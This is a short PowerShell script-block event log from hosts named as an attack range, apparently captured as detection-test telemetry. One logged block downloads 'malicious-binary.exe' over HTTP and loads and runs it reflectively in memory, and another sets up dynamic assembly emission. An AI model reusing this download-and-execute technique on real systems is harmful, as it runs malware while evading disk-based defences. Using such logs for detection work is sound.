4104132150x0218663Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-97911 $DynAssembly = New-Object System.Reflection.AssemblyName('VSSUtil')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VSSUtil', $False)559f7fc6-ca9e-4318-9449-22e25a22d488
4104132150x04991782Microsoft-Windows-PowerShell/Operationalar-win.nas.domain11$assembly = [System.Reflection.Assembly]::Load((Invoke-WebRequest 'http://127.0.0.1/malicious-binary.exe' -UseBasicParsing).Content)
$null = $assembly.GetTypes()
$method = $assembly.GetType('MaliciousProgram').GetMethod('Main', [System.Reflection.BindingFlags]'Static, Public, NonPublic')
$null = $method.Invoke($null, @())d822f734-f366-4265-b1ee-ba2e13ef4040C:\Users\Administrator\Downloads\reflection-assembly.ps1